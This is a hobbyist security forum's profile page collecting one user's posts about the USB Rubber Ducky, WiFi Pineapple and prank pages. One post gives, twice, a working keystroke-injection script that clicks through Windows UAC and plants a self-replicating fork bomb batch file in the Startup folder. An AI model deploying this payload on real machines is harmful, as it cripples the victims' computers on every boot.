Jump to content

CanadianTaco

Active Members
  • Posts

    65
  • Joined

  • Last visited

Everything posted by CanadianTaco

  1. It should all be completely possible. You should check out the USB Rubber Ducky: http://hakshop.myshopify.com/collections/frontpage/products/usb-rubber-ducky
  2. Instead of rickrolling I made a Nyan cat page that loops the music a couple of times and shows an animated nyan cat .gif It's fun :) (source files for Nyan-roll: http://www.mediafire.com/?dqierwad34z6gg8 )
  3. I like this mod... Not sure if TSA would approve...
  4. I'm in the market for a new laptop as well, and that series really interests me. How's the battery life on it?
  5. Is an external USB wifi card out of the question? : ALFA USB WiFi AWUS036H from the hakshop works perfectly...
  6. It depends. As a pen tester you can often consult multiple companies, thus making roughly the same (if not more depending on how many consults you take on)
  7. Chances are it's not the size of the SD card. It might not be inserted correctly. I plugged mine in once and it lit up red but after I re-adjusted the card and made sure the latch was closed completely it worked just fine.
  8. http://tinyurl.com/5u5ebou
  9. Well in the feature_request page of the wiki it states: So you could manually inject whichever .bin file you want. But I'm still not sure on how you would go about automatically detecting a specific OS. Maybe have the first inject.bin do so, then based on that have the if statement redirect to whichever inject(1,2,3).bin would be required for that particular OS...
  10. True, but most targeted computers would mainly Windows based...
  11. Will you still have access to the micro SD card slot?
  12. So I ran the fork bomb on a windows 7 pc I had laying around and it worked perfectly, I had to boot up into safe mode to delete the "a.bat" file from startup. So I then restarted it and now the program won't work again. It gets caught up after running cmd as administrator when UAC pops up it doesn't press the left arrow to select yes. I've tried recompiling the code but still nothing... Using the code from: http://www.usbrubberducky.com/wiki/doku.php?id=payloads CONTROL ESCAPE DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER DELAY 1000 STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER STRING copy con a.bat ENTER STRING @echo off ENTER STRING :START ENTER STRING start a.bat ENTER STRING GOTO START ENTER CONTROL z ENTER STRING a.bat ENTER ALT F4 Any ideas? -edit- For some reason this code works for me better than the previous code: CONTROL ESCAPE DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a DELAY 500 LEFT ENTER DELAY 1000 STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ ENTER STRING copy con a.bat ENTER STRING @echo off ENTER STRING :START ENTER STRING start a.bat ENTER STRING GOTO START ENTER CONTROL z ENTER STRING a.bat ENTER ALT F4 Which has got me thinking... What's the potential for running if statements with the duck. For example: Say you don't know what OS the target pc is running, so you create three different payloads (xp, Vista, 7) and then the if statement: if OS = 7 then run payload 3, and so on...???
  13. I like that background, where did you get it?
  14. Just out of curiosity... What's the solid red light on the board trying to tell me?
  15. There was this game in middle school called "on your own" (I think...) You basically get a job, pay bills, and live day to day life. I just remember finding a plain text document somewhere in the program files and editing it to give me more money, and a higher score. Not sure if that really qualifies as a 'hack' but then again it was middle school...
  16. Article I found via lifehacker. Makes for an interesting read: http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/ tl;dr/first paragraph:
  17. I haven't had a chance to look into the white||black lists just yet, maybe somebody else would have an answer for you.
  18. yup, had a few people connecting even though I had nothing set up so they weren't getting anywhere. If your having issues you could try reflashing your pineapple: http://hak5.org/hack/wifi-pineapple-flashing-guide
  19. Thanks Darren for the pineapple! I got it in the mail today and I was looking over the auto rick roll guide and was thinking "I wanna do an auto Nyan cat" hmmmmm... shouldn't be to difficult :) Thanks again Darren. Cheers! -EDIT- Created the Nyan Cat files (index.html, NYAN.mp3, NYAN.gif) tested it out, just copy these over instead of the Rick Roll files. -EDIT 2- Re-uploaded the NYAN.zip since the link was dead.
×
×
  • Create New...